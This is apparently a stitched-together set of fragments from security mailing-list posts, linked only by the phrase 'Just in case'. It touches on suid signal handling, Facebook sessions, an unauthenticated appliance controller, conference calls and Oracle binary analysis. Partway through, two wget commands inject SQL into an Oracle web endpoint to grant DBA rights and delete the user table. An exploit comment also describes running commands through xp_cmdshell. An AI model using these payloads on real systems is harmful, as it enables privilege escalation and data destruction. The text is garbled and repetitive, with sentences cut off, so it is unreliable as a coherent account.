Just in case
> Yes, and I said this is a bug, but it is in general not exploitable.
It's roughly as exploitable as any other bug which allows signals to
be sent to privileged processes, i.e. it's mostly a DoS issue.
> > Just in case it hasn't sunk in yet, the inability to trust signals is
> > a consequence of this bug. Ordinarily, it should be possible to rely
> > upon the fact that an asynchronous signal cannot be sent to a suid
> > process by an unprivileged user.
>
> I disagree with you in that. Any hard guarantee can be given only by God.
I logged out of the mobile interface on my AT&T cell phone. "Just in case"
What is also frightening / interesting is that facebook seems to link
the two sessions so that when I logged out of the phone based session to
m.facebook.com, I was also logged out of my web based session as well.
Even more interesting is that trying to login to facebook on two
separate browser sessions won't work. I.e. if I login to facebook on one
computer, and then login again on another computer, or on the same
computer in a different browser (i.e. firefox for one session and i.e.
> >
> > A consequence of this bug is that no signal can be trusted.
>
> Sure.
Just in case it hasn't sunk in yet, the inability to trust signals is
a consequence of this bug. Ordinarily, it should be possible to rely
upon the fact that an asynchronous signal cannot be sent to a suid
process by an unprivileged user.
> > Also, if it's possible to set the signal to one which cannot be
It's not exactly hard, the web controller uses a nasty set of Java
applets to interact with itself. The shocking thing is that these
communicate using a series of xml packets and absolutely zero
authentication or encryption :-(
Oh, and just in case you thought about maybe putting something secure
like an ssl webserver proxying the thing, these java applets are hard
coded to connect back to port 80 on the originating host using HTTP :-(
Still, you should get an idea of how the box is *supposed* to be used by
the fact that its ip address is set with dip switches where the
The following code tries to execute calc.exe (if the xp_cmdshell stored procedure
is not enabled, it will try to reenable it via 'sp_configure', assuming you have
the privileges of the 'sa' user), otherwise use your imagination.
Note: Reportedly, this product is end of sale ... so it's better you are aware of
it just in case you have an online installation exposed to user input :)
rgod
*/
error_reporting(E_ALL ^ E_NOTICE);
set_time_limit(0);
conference, although we strictly do not accept commercial/
product-related pitches. Keep in mind though, this is a one-day
conference, we receive a lot of submissions, so please do your best in
sending new / coolest research.
Just in case you need some ideas, some of the topics in security that
could be interesting to us:
* Mobile Devices
* Social Networking Threats
* Embedded Systems
> OS to guarantee certain behaviours. The problem here is that there is
> a mechanism which causes a guarantee to be violated.
>
Yes, and I said this is a bug, but it is in general not exploitable.
> Just in case it hasn't sunk in yet, the inability to trust signals is
> a consequence of this bug. Ordinarily, it should be possible to rely
> upon the fact that an asynchronous signal cannot be sent to a suid
> process by an unprivileged user.
>
I disagree with you in that. Any hard guarantee can be given only by God.
$ wget -O - "$TARGET/OA.jsp" "$TARGET/jtfwcpnt.jsp?query=begin%20execute%20immediate%20'grant%20dba%20to%20mom';%20end;"
$ wget -O - "$TARGET/OA.jsp" "$TARGET/jtfwcpnt.jsp?query=begin%20execute%20immediate%20'delete%20from%20apps.fnd_user';%20commit;end;"
Just in case you don't want to view the slides online or you hate (or
fear) Flash as I do, you can download the slides from my website [3] in
ODP format.
[1] Online slides: http://bit.ly/c80WeS
[2] RootedCon conference: http://www.rootedcon.es/
OK, uses shared libs, right:
-rwsr-s--x 1 oracle dba 145M Aug 31 16:42 oracle
An almost 150 megabyte executable that uses shared libraries. Actually it has 17 shared library dependencies. The other shared libraries provided by Oracle, which are dynamically linked by other executables shipped with Oracle 11g, were statically linked into the oracle executable at compile time. We are talking libraries of 30 megabytes and more linked in, as well as sitting next to the binary, just in case.
The first step of the analysis was to narrow down the relevant cryptographic algorithm and its implementation. Different techniques were used to find the relevant methods and instructions within the executable. Most cryptographic algorithms, such as ciphers and checksum calculations, expose some kind of "signature" or individual tokens such as S-boxes, transformation tables or constant values. These can often be detected automatically within the binary, using tools like the FindCrypt IDA plugin or other scripts we developed for our own purposes.
FindCrypt found at least 57 places with crypto: DES, MD4, MD5, SHA1, just to name a few. We found at least two independently implemented sets of AES cipher constants; every algorithm was implemented two or three times over.
Anything Information Security related is interesting for the
conference, although we do not accept commercial/ product-related
talks.
Just in case you need some ideas, some of the stuff that would be
interesting to us are:
* Operating Systems
* Career and Management topics
* Mobile Devices/Embedded Systems